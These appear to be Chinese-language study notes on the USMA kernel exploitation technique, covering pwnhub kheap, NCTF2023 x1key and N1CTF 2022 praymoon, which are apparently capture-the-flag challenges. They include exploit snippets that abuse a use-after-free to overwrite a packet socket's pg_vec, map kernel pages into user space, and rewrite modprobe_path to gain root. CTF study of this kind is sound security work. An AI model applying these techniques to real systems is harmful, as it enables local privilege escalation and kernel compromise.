attack demo - USMA

USMA（User-Space-Mapping-Attack）

允许普通用户进程可以映射内核态内存并且修改内核代码段，通过这个方法，我们可以绕过Linux内核中的CFI缓解措施，在内核态中执行任意代码
360漏洞研究院：USMA:用户态映射攻击
视频
文档

pwnhub 3月公开赛 - kheap

0x20 大小的 UAF，开启了 SMEP\KASLR
之前的方式是通过seq_operation结构体函数指针劫持 + 栈迁移，绕过SMEP
参考

---

下面链接使用的是USMA
参考
核心代码

int packet_fd = pagealloc_pad(0x20 / 8, 4096);  // 什么分配4个0x1000大小page, struct pgv *pg_vec; 分配符合UAF大小0x20
read(fd, buf, 0x20);
binary_dump("pg_vec data", buf, 0x20);
*(size_t*)buf = modprobe_path - 0x2e0;
write(fd, buf, 0x20);       // 对pg_vec中的虚拟地址进行覆写
char *page = NULL, *modprobe_path_ptr = NULL;
page = mmap(NULL, 0x1000*(0x20 / 8), PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);	// 通过pg_vec，把modprobe_path_ptr所在的页，映射到用户态
modprobe_path_ptr = page + 0x2e0;
puts(modprobe_path_ptr);

strcpy(modprobe_path_ptr, "/home/x");

【dir+USMA】NCTF2023 - x1key

也是0x20大小的UAF，没有读方法，不能泄露内核地址
参考

unshare_setup();
fd = open("/dev/x1key", O_RDONLY);

int shm_fd = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0666);
char* shm_ptr = shmat(shm_fd, NULL, SHM_RDONLY); // 申请0x20,要被上溢的slab

add();  // vuln slab

shmdt(shm_ptr); // 释放

int nr = 0x20 / 8;
int packet_fd = pagealloc_pad(nr, 0x1000);  // 占据 shm_file_data 

char *page = NULL, *modprobe_path = NULL;
for (int i = 0; i < 0x80; i++)
{
        edit(0, (i<<20)|0x2a000);   // 修改packet_fd中的pg_vec
        page = mmap(NULL, 0x1000*nr, PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);
        if (page == -1) continue;
        modprobe_path = page + 0x1000*(nr-1) + 0xc0;
        if (!strcmp(modprobe_path, "/sbin/modprobe")) break;
        munmap(page, 0x1000*nr);
}

strcpy(modprobe_path, "/tmp/x");

N1CTF 2022 praymoon

参考
这个是通过__sys_setresuid进行提权的，单单USMA利用逻辑上和原始文章一致